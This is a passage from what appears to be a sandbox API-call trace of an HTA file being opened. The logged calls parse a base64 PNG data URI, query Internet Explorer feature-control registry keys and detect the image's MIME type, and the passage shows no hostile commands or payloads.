pwzURI="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAEAAAABACAQAAAAAYLlVAAAABGdBTUEAALGPC/xhBQAAACBjSFJNAAB6JQAAgIMAAPn/AACA6QAAdTAAAOpgAAA6mAAAF2+SX8VGAAAAAmJLR0QA/4ePzL8AAAAJcEhZcwAACxMAAAsTAQCanBgAAAAHdElNRQfjAwwMJwSFwIn8AAADNklEQVRo3u2ZTUhUURTHfzozmprmZ1pYEmkfJNEmiwwkSEyFECIQpEUboYhqFYHQXlcti9rUKldWBEUiuQpbtDDNzD5G8qM0HRXLRtO5LdJx3puPd++8+xyIztm88zgf/3veufeee18SdimDI1RxnL0U4gbAzxhDdPGCfpZs+49JWTTyFB8iAq8wTju1pDgXvopOliIGX+d57rHPieBuLvLNIvgaD1KvP/x1FiTDCwQTNOkFcJVfCuEFgq+c0he+minF8AJBH2WRnCUph8/nIZVhb2d5w1smEbjYSTn7SQ/TucsFlnWkPxBW6Xc4RkbIoHKooSNshsxRbT98Eb0mtyM04oqgmR6hUNvtrwrnWDa4nOVMVF0XLfw2aPuosBfezQPTmNpiVtFmnpj0W+wBKMFrcPeJ3RYWNfwwWHSSZgdAHX6Du5uWFpl0myqm1KiQrASgnNQQaZFOS4t5nhvkAnbZAbDHIE0wIGHzmsUQKdXkQwlACtsN8ijfJay8zBjkovgBbCLPlAG/hNUcswa5IH4Ayasdzxr5pBbWRRYMstGHYg04QAkH4FbQFSwTCKbdI7mzWVipbMceKtiCCFqO0OeY1caRbAaKOcgOCpQ+WWTyM8EwvfjkTfJoYZDFONqwaPyTHs7LbktlPNMYep2XuE22dfhsHjkS/i+3Wn/SK2EdoE72UeuyGH8rxbbLLjqlkRlb4TAzDo5fIJiOvRTnR+ju9VJuwveC/wASDsD+2h5KUyyQTVZiALzjFt3MsY16mtmqx2mt9BbUw4EQuzpGpVcCLQB8nDBZXmJFDoCeInzFS9ObxwzLmeoBMGA4/QBM4t1IAOHXDi7Zqwg9ACrCWotS8xnQWQCHOGsafzOFOhzLT8NxmoI3RZncULjG1ARA8DHYupxUucbUtxd4ghnw4JI30wdARHneMABx0j8FYD3xCkdefQByKFl9KsOjy6nKNBR0cZRCTjOk1JhrBCCY5r3pZtSS9bZkueSqmljVgPoPDa0Algk4HD8QG8AXph0G8Dk2AC89DgPosFKodvR83G/dtiRzTevtUChP0SCTpBQuM+bI6Bvk51gl96X/FFvzCh9oW0v+H2zO2tYtz/EgAAAAJXRFWHRkYXRlOmNyZWF0ZQAyMDE5LTAzLTEyVDEyOjM5OjA0KzAwOjAwG6lIYwAAACV0RVh0ZGF0ZTptb2RpZnkAMjAxOS0wMy0xMlQxMjozOTowNCswMDowMGr08N8AAAAASUVORK5CYII=", dwFlags=0x2b85, dwReserved=0x0, ppURI=0x41d5a8 | out: ppURI=0x41d5a8*=0x49d4bc) returned 0x0 [0227.748] ParseURLW (in: pcszURL="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta", ppu=0x41d438 | out: ppu=0x41d438) returned 0x0 [0227.748] CreateUri (in: pwzURI="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta", dwFlags=0x2b85, dwReserved=0x0, ppURI=0x41d4f4 | out: ppURI=0x41d4f4*=0x49c07c) returned 0x0 [0227.748] IUnknown:QueryInterface (in: This=0x49c07c, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x41d4bc | out: ppvObject=0x41d4bc*=0x49c07c) returned 0x0 [0227.748] IUnknown:Release (This=0x49c07c) returned 0xd [0227.748] IUnknown:AddRef (This=0x49c07c) returned 0xe [0227.748] CoInternetCombineIUri (in: pBaseUri=0x49c07c, pRelativeUri=0x49d4bc, dwCombineFlags=0x6000000, ppCombinedUri=0x41d528, dwReserved=0x0 | out: ppCombinedUri=0x41d528*=0x49d4bc) returned 0x0 [0227.748] IUnknown:Release (This=0x49c07c) returned 0xd [0227.749] IUnknown:Release (This=0x49c07c) returned 0xc [0227.749] IUnknown:QueryInterface (in: This=0x49d4bc, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x41d47c | out: ppvObject=0x41d47c*=0x49d4bc) returned 0x0 [0227.749] IUnknown:Release (This=0x49d4bc) returned 0x3 [0227.749] IUnknown:AddRef (This=0x49d4bc) returned 0x4 [0227.749] IUri:GetAbsoluteUri (in: This=0x49d4bc, pbstrAbsoluteUri=0x41d470 | out: pbstrAbsoluteUri=0x41d470*="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAEAAAABACAQAAAAAYLlVAAAABGdBTUEAALGPC/xhBQAAACBjSFJNAAB6JQAAgIMAAPn/AACA6QAAdTAAAOpgAAA6mAAAF2+SX8VGAAAAAmJLR0QA/4ePzL8AAAAJcEhZcwAACxMAAAsTAQCanBgAAAAHdElNRQfjAwwMJwSFwIn8AAADNklEQVRo3u2ZTUhUURTHfzozmprmZ1pYEmkfJNEmiwwkSEyFECIQpEUboYhqFYHQXlcti9rUKldWBEUiuQpbtDDNzD5G8qM0HRXLRtO5LdJx3puPd++8+xyIztm88zgf/3veufeee18SdimDI1RxnL0U4gbAzxhDdPGCfpZs+49JWTTyFB8iAq8wTju1pDgXvopOliIGX+d57rHPieBuLvLNIvgaD1KvP/x1FiTDCwQTNOkFcJVfCuEFgq+c0he+minF8AJBH2WRnCUph8/nIZVhb2d5w1smEbjYSTn7SQ/TucsFlnWkPxBW6Xc4RkbIoHKooSNshsxRbT98Eb0mtyM04oqgmR6hUNvtrwrnWDa4nOVMVF0XLfw2aPuosBfezQPTmNpiVtFmnpj0W+wBKMFrcPeJ3RYWNfwwWHSSZgdAHX6Du5uWFpl0myqm1KiQrASgnNQQaZFOS4t5nhvkAnbZAbDHIE0wIGHzmsUQKdXkQwlACtsN8ijfJay8zBjkovgBbCLPlAG/hNUcswa5IH4Ayasdzxr5pBbWRRYMstGHYg04QAkH4FbQFSwTCKbdI7mzWVipbMceKtiCCFqO0OeY1caRbAaKOcgOCpQ+WWTyM8EwvfjkTfJoYZDFONqwaPyTHs7LbktlPNMYep2XuE22dfhsHjkS/i+3Wn/SK2EdoE72UeuyGH8rxbbLLjqlkRlb4TAzDo5fIJiOvRTnR+ju9VJuwveC/wASDsD+2h5KUyyQTVZiALzjFt3MsY16mtmqx2mt9BbUw4EQuzpGpVcCLQB8nDBZXmJFDoCeInzFS9ObxwzLmeoBMGA4/QBM4t1IAOHXDi7Zqwg9ACrCWotS8xnQWQCHOGsafzOFOhzLT8NxmoI3RZncULjG1ARA8DHYupxUucbUtxd4ghnw4JI30wdARHneMABx0j8FYD3xCkdefQByKFl9KsOjy6nKNBR0cZRCTjOk1JhrBCCY5r3pZtSS9bZkueSqmljVgPoPDa0Algk4HD8QG8AXph0G8Dk2AC89DgPosFKodvR83G/dtiRzTevtUChP0SCTpBQuM+bI6Bvk51gl96X/FFvzCh9oW0v+H2zO2tYtz/EgAAAAJXRFWHRkYXRlOmNyZWF0ZQAyMDE5LTAzLTEyVDEyOjM5OjA0KzAwOjAwG6lIYwAAACV0RVh0ZGF0ZTptb2RpZnkAMjAxOS0wMy0xMlQxMjozOTowNCswMDowMGr08N8AAAAASUVORK5CYII=") returned 0x0 [0227.749] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xf4) returned 0x4e0530 [0227.749] IUnknown:AddRef (This=0x49d4bc) returned 0x5 [0227.749] IUnknown:QueryInterface (in: This=0x49d4bc, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x41d444 | out: ppvObject=0x41d444*=0x49d4bc) returned 0x0 [0227.749] IUnknown:Release (This=0x49d4bc) returned 0x5 [0227.749] IUnknown:AddRef (This=0x49d4bc) returned 0x6 [0227.749] IUri:GetScheme (in: This=0x49d4bc, pdwScheme=0x41d490 | out: pdwScheme=0x41d490*=0x0) returned 0x0 [0227.749] IUnknown:Release (This=0x49d4bc) returned 0x5 [0227.749] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x4c) returned 0x4df958 [0227.749] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x48) returned 0x4bfd80 [0227.749] IInternetSecurityManager:MapUrlToZone (in: This=0x4a2880, pwszUrl="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta", pdwZone=0x41d488, dwFlags=0x0 | out: pdwZone=0x41d488*=0x0) returned 0x0 [0227.750] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x1b0) returned 0x4d7328 [0227.750] IUnknown:QueryInterface (in: This=0x49d4bc, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x41d184 | out: ppvObject=0x41d184*=0x49d4bc) returned 0x0 [0227.750] IUnknown:Release (This=0x49d4bc) returned 0x5 [0227.750] IUnknown:AddRef (This=0x49d4bc) returned 0x6 [0227.750] ParseURLW (in: pcszURL="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAEAAAABACAQAAAAAYLlVAAAABGdBTUEAALGPC/xhBQAAACBjSFJNAAB6JQAAgIMAAPn/AACA6QAAdTAAAOpgAAA6mAAAF2+SX8VGAAAAAmJLR0QA/4ePzL8AAAAJcEhZcwAACxMAAAsTAQCanBgAAAAHdElNRQfjAwwMJwSFwIn8AAADNklEQVRo3u2ZTUhUURTHfzozmprmZ1pYEmkfJNEmiwwkSEyFECIQpEUboYhqFYHQXlcti9rUKldWBEUiuQpbtDDNzD5G8qM0HRXLRtO5LdJx3puPd++8+xyIztm88zgf/3veufeee18SdimDI1RxnL0U4gbAzxhDdPGCfpZs+49JWTTyFB8iAq8wTju1pDgXvopOliIGX+d57rHPieBuLvLNIvgaD1KvP/x1FiTDCwQTNOkFcJVfCuEFgq+c0he+minF8AJBH2WRnCUph8/nIZVhb2d5w1smEbjYSTn7SQ/TucsFlnWkPxBW6Xc4RkbIoHKooSNshsxRbT98Eb0mtyM04oqgmR6hUNvtrwrnWDa4nOVMVF0XLfw2aPuosBfezQPTmNpiVtFmnpj0W+wBKMFrcPeJ3RYWNfwwWHSSZgdAHX6Du5uWFpl0myqm1KiQrASgnNQQaZFOS4t5nhvkAnbZAbDHIE0wIGHzmsUQKdXkQwlACtsN8ijfJay8zBjkovgBbCLPlAG/hNUcswa5IH4Ayasdzxr5pBbWRRYMstGHYg04QAkH4FbQFSwTCKbdI7mzWVipbMceKtiCCFqO0OeY1caRbAaKOcgOCpQ+WWTyM8EwvfjkTfJoYZDFONqwaPyTHs7LbktlPNMYep2XuE22dfhsHjkS/i+3Wn/SK2EdoE72UeuyGH8rxbbLLjqlkRlb4TAzDo5fIJiOvRTnR+ju9VJuwveC/wASDsD+2h5KUyyQTVZiALzjFt3MsY16mtmqx2mt9BbUw4EQuzpGpVcCLQB8nDBZXmJFDoCeInzFS9ObxwzLmeoBMGA4/QBM4t1IAOHXDi7Zqwg9ACrCWotS8xnQWQCHOGsafzOFOhzLT8NxmoI3RZncULjG1ARA8DHYupxUucbUtxd4ghnw4JI30wdARHneMABx0j8FYD3xCkdefQByKFl9KsOjy6nKNBR0cZRCTjOk1JhrBCCY5r3pZtSS9bZkueSqmljVgPoPDa0Algk4HD8QG8AXph0G8Dk2AC89DgPosFKodvR83G/dtiRzTevtUChP0SCTpBQuM+bI6Bvk51gl96X/FFvzCh9oW0v+H2zO2tYtz/EgAAAAJXRFWHRkYXRlOmNyZWF0ZQAyMDE5LTAzLTEyVDEyOjM5OjA0KzAwOjAwG6lIYwAAACV0RVh0ZGF0ZTptb2RpZnkAMjAxOS0wMy0xMlQxMjozOTowNCswMDowMGr08N8AAAAASUVORK5CYII=", ppu=0x41d148 | out: ppu=0x41d148) returned 0x0 [0227.750] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0227.750] IUnknown:AddRef (This=0x49d4bc) returned 0x7 [0227.750] IUnknown:AddRef (This=0x49d4bc) returned 0x8 [0227.750] IUnknown:QueryInterface (in: This=0x49d4bc, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x41d178 | out: ppvObject=0x41d178*=0x49d4bc) returned 0x0 [0227.750] IUnknown:Release (This=0x49d4bc) returned 0x8 [0227.750] IUnknown:AddRef (This=0x49d4bc) returned 0x9 [0227.750] IUri:GetScheme (in: This=0x49d4bc, pdwScheme=0x4d7430 | out: pdwScheme=0x4d7430*=0x0) returned 0x0 [0227.750] IUri:GetSchemeName (in: This=0x49d4bc, pbstrSchemeName=0x41d178 | out: pbstrSchemeName=0x41d178*="data") returned 0x0 [0227.750] _wcsnicmp (_String1="data", _String2="data", _MaxCount=0x5) returned 0 [0227.750] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x41d0f8 | out: phkResult=0x41d0f8*=0x250) returned 0x0 [0227.750] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x41d0fc | out: phkResult=0x41d0fc*=0x24c) returned 0x0 [0227.750] RegOpenKeyExW (in: hKey=0x24c, lpSubKey="FEATURE_DATAURI", ulOptions=0x0, samDesired=0x1, phkResult=0x41d0b8 | out: phkResult=0x41d0b8*=0x0) returned 0x2 [0227.750] RegOpenKeyExW (in: hKey=0x250, lpSubKey="FEATURE_DATAURI", ulOptions=0x0, samDesired=0x1, phkResult=0x41d0b8 | out: phkResult=0x41d0b8*=0x0) returned 0x2 [0227.751] RegCloseKey (hKey=0x0) returned 0x6 [0227.751] RegCloseKey (hKey=0x0) returned 0x6 [0227.751] RegCloseKey (hKey=0x250) returned 0x0 [0227.751] RegCloseKey (hKey=0x24c) returned 0x0 [0227.751] IUnknown:QueryInterface (in: This=0x49d4bc, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x41d184 | out: ppvObject=0x41d184*=0x49d4bc) returned 0x0 [0227.751] IUnknown:Release (This=0x49d4bc) returned 0x9 [0227.751] IUnknown:AddRef (This=0x49d4bc) returned 0xa [0227.751] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x10) returned 0x4db170 [0227.751] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1bc) returned 0x4db540 [0227.751] CreateUri (in: pwzURI="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAEAAAABACAQAAAAAYLlVAAAABGdBTUEAALGPC/xhBQAAACBjSFJNAAB6JQAAgIMAAPn/AACA6QAAdTAAAOpgAAA6mAAAF2+SX8VGAAAAAmJLR0QA/4ePzL8AAAAJcEhZcwAACxMAAAsTAQCanBgAAAAHdElNRQfjAwwMJwSFwIn8AAADNklEQVRo3u2ZTUhUURTHfzozmprmZ1pYEmkfJNEmiwwkSEyFECIQpEUboYhqFYHQXlcti9rUKldWBEUiuQpbtDDNzD5G8qM0HRXLRtO5LdJx3puPd++8+xyIztm88zgf/3veufeee18SdimDI1RxnL0U4gbAzxhDdPGCfpZs+49JWTTyFB8iAq8wTju1pDgXvopOliIGX+d57rHPieBuLvLNIvgaD1KvP/x1FiTDCwQTNOkFcJVfCuEFgq+c0he+minF8AJBH2WRnCUph8/nIZVhb2d5w1smEbjYSTn7SQ/TucsFlnWkPxBW6Xc4RkbIoHKooSNshsxRbT98Eb0mtyM04oqgmR6hUNvtrwrnWDa4nOVMVF0XLfw2aPuosBfezQPTmNpiVtFmnpj0W+wBKMFrcPeJ3RYWNfwwWHSSZgdAHX6Du5uWFpl0myqm1KiQrASgnNQQaZFOS4t5nhvkAnbZAbDHIE0wIGHzmsUQKdXkQwlACtsN8ijfJay8zBjkovgBbCLPlAG/hNUcswa5IH4Ayasdzxr5pBbWRRYMstGHYg04QAkH4FbQFSwTCKbdI7mzWVipbMceKtiCCFqO0OeY1caRbAaKOcgOCpQ+WWTyM8EwvfjkTfJoYZDFONqwaPyTHs7LbktlPNMYep2XuE22dfhsHjkS/i+3Wn/SK2EdoE72UeuyGH8rxbbLLjqlkRlb4TAzDo5fIJiOvRTnR+ju9VJuwveC/wASDsD+2h5KUyyQTVZiALzjFt3MsY16mtmqx2mt9BbUw4EQuzpGpVcCLQB8nDBZXmJFDoCeInzFS9ObxwzLmeoBMGA4/QBM4t1IAOHXDi7Zqwg9ACrCWotS8xnQWQCHOGsafzOFOhzLT8NxmoI3RZncULjG1ARA8DHYupxUucbUtxd4ghnw4JI30wdARHneMABx0j8FYD3xCkdefQByKFl9KsOjy6nKNBR0cZRCTjOk1JhrBCCY5r3pZtSS9bZkueSqmljVgPoPDa0Algk4HD8QG8AXph0G8Dk2AC89DgPosFKodvR83G/dtiRzTevtUChP0SCTpBQuM+bI6Bvk51gl96X/FFvzCh9oW0v+H2zO2tYtz/EgAAAAJXRFWHRkYXRlOmNyZWF0ZQAyMDE5LTAzLTEyVDEyOjM5OjA0KzAwOjAwG6lIYwAAACV0RVh0ZGF0ZTptb2RpZnkAMjAxOS0wMy0xMlQxMjozOTowNCswMDowMGr08N8AAAAASUVORK5CYII=", dwFlags=0x2b80, dwReserved=0x0, ppURI=0x41d0f4 | out: ppURI=0x41d0f4*=0x49d4bc) returned 0x0 [0227.751] IUri:GetSchemeName (in: This=0x49d4bc, pbstrSchemeName=0x41d0d4 | out: pbstrSchemeName=0x41d0d4*="data") returned 0x0 [0227.751] _wcsnicmp (_String1="data", _String2="data", _MaxCount=0x5) returned 0 [0227.751] IUri:GetPathAndQuery (in: This=0x49d4bc, pbstrPathAndQuery=0x41d100 | out: pbstrPathAndQuery=0x41d100*="image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAEAAAABACAQAAAAAYLlVAAAABGdBTUEAALGPC/xhBQAAACBjSFJNAAB6JQAAgIMAAPn/AACA6QAAdTAAAOpgAAA6mAAAF2+SX8VGAAAAAmJLR0QA/4ePzL8AAAAJcEhZcwAACxMAAAsTAQCanBgAAAAHdElNRQfjAwwMJwSFwIn8AAADNklEQVRo3u2ZTUhUURTHfzozmprmZ1pYEmkfJNEmiwwkSEyFECIQpEUboYhqFYHQXlcti9rUKldWBEUiuQpbtDDNzD5G8qM0HRXLRtO5LdJx3puPd++8+xyIztm88zgf/3veufeee18SdimDI1RxnL0U4gbAzxhDdPGCfpZs+49JWTTyFB8iAq8wTju1pDgXvopOliIGX+d57rHPieBuLvLNIvgaD1KvP/x1FiTDCwQTNOkFcJVfCuEFgq+c0he+minF8AJBH2WRnCUph8/nIZVhb2d5w1smEbjYSTn7SQ/TucsFlnWkPxBW6Xc4RkbIoHKooSNshsxRbT98Eb0mtyM04oqgmR6hUNvtrwrnWDa4nOVMVF0XLfw2aPuosBfezQPTmNpiVtFmnpj0W+wBKMFrcPeJ3RYWNfwwWHSSZgdAHX6Du5uWFpl0myqm1KiQrASgnNQQaZFOS4t5nhvkAnbZAbDHIE0wIGHzmsUQKdXkQwlACtsN8ijfJay8zBjkovgBbCLPlAG/hNUcswa5IH4Ayasdzxr5pBbWRRYMstGHYg04QAkH4FbQFSwTCKbdI7mzWVipbMceKtiCCFqO0OeY1caRbAaKOcgOCpQ+WWTyM8EwvfjkTfJoYZDFONqwaPyTHs7LbktlPNMYep2XuE22dfhsHjkS/i+3Wn/SK2EdoE72UeuyGH8rxbbLLjqlkRlb4TAzDo5fIJiOvRTnR+ju9VJuwveC/wASDsD+2h5KUyyQTVZiALzjFt3MsY16mtmqx2mt9BbUw4EQuzpGpVcCLQB8nDBZXmJFDoCeInzFS9ObxwzLmeoBMGA4/QBM4t1IAOHXDi7Zqwg9ACrCWotS8xnQWQCHOGsafzOFOhzLT8NxmoI3RZncULjG1ARA8DHYupxUucbUtxd4ghnw4JI30wdARHneMABx0j8FYD3xCkdefQByKFl9KsOjy6nKNBR0cZRCTjOk1JhrBCCY5r3pZtSS9bZkueSqmljVgPoPDa0Algk4HD8QG8AXph0G8Dk2AC89DgPosFKodvR83G/dtiRzTevtUChP0SCTpBQuM+bI6Bvk51gl96X/FFvzCh9oW0v+H2zO2tYtz/EgAAAAJXRFWHRkYXRlOmNyZWF0ZQAyMDE5LTAzLTEyVDEyOjM5OjA0KzAwOjAwG6lIYwAAACV0RVh0ZGF0ZTptb2RpZnkAMjAxOS0wMy0xMlQxMjozOTowNCswMDowMGr08N8AAAAASUVORK5CYII=") returned 0x0 [0227.751] IUnknown:Release (This=0x49d4bc) returned 0xa [0227.751] SysStringLen (param_1="image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAEAAAABACAQAAAAAYLlVAAAABGdBTUEAALGPC/xhBQAAACBjSFJNAAB6JQAAgIMAAPn/AACA6QAAdTAAAOpgAAA6mAAAF2+SX8VGAAAAAmJLR0QA/4ePzL8AAAAJcEhZcwAACxMAAAsTAQCanBgAAAAHdElNRQfjAwwMJwSFwIn8AAADNklEQVRo3u2ZTUhUURTHfzozmprmZ1pYEmkfJNEmiwwkSEyFECIQpEUboYhqFYHQXlcti9rUKldWBEUiuQpbtDDNzD5G8qM0HRXLRtO5LdJx3puPd++8+xyIztm88zgf/3veufeee18SdimDI1RxnL0U4gbAzxhDdPGCfpZs+49JWTTyFB8iAq8wTju1pDgXvopOliIGX+d57rHPieBuLvLNIvgaD1KvP/x1FiTDCwQTNOkFcJVfCuEFgq+c0he+minF8AJBH2WRnCUph8/nIZVhb2d5w1smEbjYSTn7SQ/TucsFlnWkPxBW6Xc4RkbIoHKooSNshsxRbT98Eb0mtyM04oqgmR6hUNvtrwrnWDa4nOVMVF0XLfw2aPuosBfezQPTmNpiVtFmnpj0W+wBKMFrcPeJ3RYWNfwwWHSSZgdAHX6Du5uWFpl0myqm1KiQrASgnNQQaZFOS4t5nhvkAnbZAbDHIE0wIGHzmsUQKdXkQwlACtsN8ijfJay8zBjkovgBbCLPlAG/hNUcswa5IH4Ayasdzxr5pBbWRRYMstGHYg04QAkH4FbQFSwTCKbdI7mzWVipbMceKtiCCFqO0OeY1caRbAaKOcgOCpQ+WWTyM8EwvfjkTfJoYZDFONqwaPyTHs7LbktlPNMYep2XuE22dfhsHjkS/i+3Wn/SK2EdoE72UeuyGH8rxbbLLjqlkRlb4TAzDo5fIJiOvRTnR+ju9VJuwveC/wASDsD+2h5KUyyQTVZiALzjFt3MsY16mtmqx2mt9BbUw4EQuzpGpVcCLQB8nDBZXmJFDoCeInzFS9ObxwzLmeoBMGA4/QBM4t1IAOHXDi7Zqwg9ACrCWotS8xnQWQCHOGsafzOFOhzLT8NxmoI3RZncULjG1ARA8DHYupxUucbUtxd4ghnw4JI30wdARHneMABx0j8FYD3xCkdefQByKFl9KsOjy6nKNBR0cZRCTjOk1JhrBCCY5r3pZtSS9bZkueSqmljVgPoPDa0Algk4HD8QG8AXph0G8Dk2AC89DgPosFKodvR83G/dtiRzTevtUChP0SCTpBQuM+bI6Bvk51gl96X/FFvzCh9oW0v+H2zO2tYtz/EgAAAAJXRFWHRkYXRlOmNyZWF0ZQAyMDE5LTAzLTEyVDEyOjM5OjA0KzAwOjAwG6lIYwAAACV0RVh0ZGF0ZTptb2RpZnkAMjAxOS0wMy0xMlQxMjozOTowNCswMDowMGr08N8AAAAASUVORK5CYII=") returned 0x5c1 [0227.759] CryptStringToBinaryW (in: pszString="iVBORw0KGgoAAAANSUhEUgAAAEAAAABACAQAAAAAYLlVAAAABGdBTUEAALGPC/xhBQAAACBjSFJNAAB6JQAAgIMAAPn/AACA6QAAdTAAAOpgAAA6mAAAF2+SX8VGAAAAAmJLR0QA/4ePzL8AAAAJcEhZcwAACxMAAAsTAQCanBgAAAAHdElNRQfjAwwMJwSFwIn8AAADNklEQVRo3u2ZTUhUURTHfzozmprmZ1pYEmkfJNEmiwwkSEyFECIQpEUboYhqFYHQXlcti9rUKldWBEUiuQpbtDDNzD5G8qM0HRXLRtO5LdJx3puPd++8+xyIztm88zgf/3veufeee18SdimDI1RxnL0U4gbAzxhDdPGCfpZs+49JWTTyFB8iAq8wTju1pDgXvopOliIGX+d57rHPieBuLvLNIvgaD1KvP/x1FiTDCwQTNOkFcJVfCuEFgq+c0he+minF8AJBH2WRnCUph8/nIZVhb2d5w1smEbjYSTn7SQ/TucsFlnWkPxBW6Xc4RkbIoHKooSNshsxRbT98Eb0mtyM04oqgmR6hUNvtrwrnWDa4nOVMVF0XLfw2aPuosBfezQPTmNpiVtFmnpj0W+wBKMFrcPeJ3RYWNfwwWHSSZgdAHX6Du5uWFpl0myqm1KiQrASgnNQQaZFOS4t5nhvkAnbZAbDHIE0wIGHzmsUQKdXkQwlACtsN8ijfJay8zBjkovgBbCLPlAG/hNUcswa5IH4Ayasdzxr5pBbWRRYMstGHYg04QAkH4FbQFSwTCKbdI7mzWVipbMceKtiCCFqO0OeY1caRbAaKOcgOCpQ+WWTyM8EwvfjkTfJoYZDFONqwaPyTHs7LbktlPNMYep2XuE22dfhsHjkS/i+3Wn/SK2EdoE72UeuyGH8rxbbLLjqlkRlb4TAzDo5fIJiOvRTnR+ju9VJuwveC/wASDsD+2h5KUyyQTVZiALzjFt3MsY16mtmqx2mt9BbUw4EQuzpGpVcCLQB8nDBZXmJFDoCeInzFS9ObxwzLmeoBMGA4/QBM4t1IAOHXDi7Zqwg9ACrCWotS8xnQWQCHOGsafzOFOhzLT8NxmoI3RZncULjG1ARA8DHYupxUucbUtxd4ghnw4JI30wdARHneMABx0j8FYD3xCkdefQByKFl9KsOjy6nKNBR0cZRCTjOk1JhrBCCY5r3pZtSS9bZkueSqmljVgPoPDa0Algk4HD8QG8AXph0G8Dk2AC89DgPosFKodvR83G/dtiRzTevtUChP0SCTpBQuM+bI6Bvk51gl96X/FFvzCh9oW0v+H2zO2tYtz/EgAAAAJXRFWHRkYXRlOmNyZWF0ZQAyMDE5LTAzLTEyVDEyOjM5OjA0KzAwOjAwG6lIYwAAACV0RVh0ZGF0ZTptb2RpZnkAMjAxOS0wMy0xMlQxMjozOTowNCswMDowMGr08N8AAAAASUVORK5CYII=", cchString=0x5b0, dwFlags=0x1, pbBinary=0x4eca10, pcbBinary=0x41d0cc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x4eca10, pcbBinary=0x41d0cc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0227.759] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x14) returned 0x4da5d8 [0227.759] GetProcessHeap () returned 0x470000 [0227.759] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x443) returned 0x4ecea8 [0227.759] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4eca10 | out: hHeap=0x470000) returned 1 [0227.759] lstrlenW (lpString="") returned 0 [0227.759] lstrlenW (lpString="image/png") returned 9 [0227.759] lstrlenW (lpString="") returned 0 [0227.760] StrCmpNICW (lpStr1="image/pn", lpStr2="text/css", nChar=8) returned -11 [0227.760] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x443) returned 0x4eca10 [0227.760] lstrlenW (lpString="image/png") returned 9 [0227.760] FindMimeFromData (in: pBC=0x0, pwzUrl=0x0, pBuffer=0x4eca10, cbSize=0x443, pwzMimeProposed="image/png", dwMimeFlags=0x2, ppwzMimeOut=0x4db548, dwReserved=0x0 | out: ppwzMimeOut=0x4db548*="image/x-png") returned 0x0 [0227.760] StrCmpICW (pszStr1="image/x-png", pszStr2="text/xml") returned -11 [0227.760] StrCmpNICW (lpStr1="image/x-", lpStr2="text/css", nChar=8) returned -11 [0227.760] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4eca10 | out: hHeap=0x470000) returned 1 [0227.760] IUnknown:Release (This=0x49d4bc) returned 0x9 [0227.760] IUnknown:Release (This=0x49d4bc) returned 0x8 [0227.760] IUnknown:Release (This=0x49d4bc) returned 0x7 [0227.760] CoTaskMemFree (pv=0x0) [0227.761] GetCurrentThreadId () returned 0x390 [0227.761] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xb92) returned 0x4ed2f8 [0227.761] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4db188 [0227.761] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x4a8) returned 0x4ede98 [0227.761] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x98) returned 0x4d74e0 [0227.761] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x24c [0227.761] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x7406e718, lpParameter=0x4d74e0, dwCreationFlags=0x0, lpThreadId=0x4d74f4 | out: 